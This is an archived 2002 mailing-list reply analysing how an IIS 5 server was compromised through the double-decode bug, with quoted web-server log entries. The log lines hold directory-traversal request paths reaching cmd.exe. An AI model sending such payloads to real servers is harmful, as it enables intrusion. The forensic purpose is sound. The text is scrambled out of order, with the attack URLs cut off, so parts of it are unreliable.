|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: Matt Scarborough (vexversa_at_verizon.net)
Date: Thu Jul 11 2002 - 23:25:54 CDT
On Thu, 11 Jul 2002 10:09:28 -0500, "Matt Andreko" wrote
> I have been asked by many to see the logs. I have also posted them to
> the website at http://www.criminalsmostly.com/~mandreko/logs.zip (didn't
> want to post a really really long post)
>
> I appreciate all the responses I'm getting, I'm finding out more that I
> did not know about this little file. I'm mainly trying to figure out
> how it got there, and where it came from.
On an unrelated note, this server is Windows 2000 and not vulnerable to the
HK.EXE exploit (patched by MS00-003.) Richard Bartlett's descriptions of the
toolkit seem a likely explanation.
As to how cc.exe got there, the logs referenced above show the server
vulnerable to the double-decode bug (patched by MS01-026.)
For example
Additionally, the familiar
CGI Error
The specified CGI application misbehaved by not returning a complete set of
1 file(s) copied.
The attack URLs above sent to a double-decode bug vulnerable server are
#Software: Microsoft Internet Information Services 5.0
As such, the attack URL
As preliminary guesswork only, most of the other logs indicate automated
Matt Scarborough 2002-07-12
----------------------------------------------------------------------------
http://
will leave a 200 response from IIS 5 in the logs and actually transfer the
file CMD.EXE to the attacker. This behavior is a change from the Unicode bug
(patched by MS00-086) which would have returned a directory listing to the
attacker.
http://
will leave a 502 response from IIS 5 in the logs, and output to the attacker
HTTP headers. The headers it did return are:
consistent with your ex020522.log
#Version: 1.0
#Date: 2002-05-22 12:05:49
#Fields: time c-ip cs-method cs-uri-stem sc-status
<snip>
12:05:49 212.179.250.122 HEAD /scripts/..%5c..%5cwinnt/system32/cmd.exe 502
12:05:52 212.179.250.122 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe 200
12:06:55 212.179.250.122 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe 502
12:07:20 212.179.250.122 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe 502
12:10:51 212.179.250.122 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe 502
http://
could have transferred the file cc.exe to the victim server using TFTP.
Since you are not logging cs-uri-queries we may not be sure what commands
successfully returned the 200 or 502 responses.
tools (several requests within the span of a second or two.) The compromise
*seems* to have been mounted from the same ADSL netblock. Inspection of the
logs *seems* to reveal an automated tool first, run on two successive days,
followed by manual attack --- all originating from that same IP block.
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com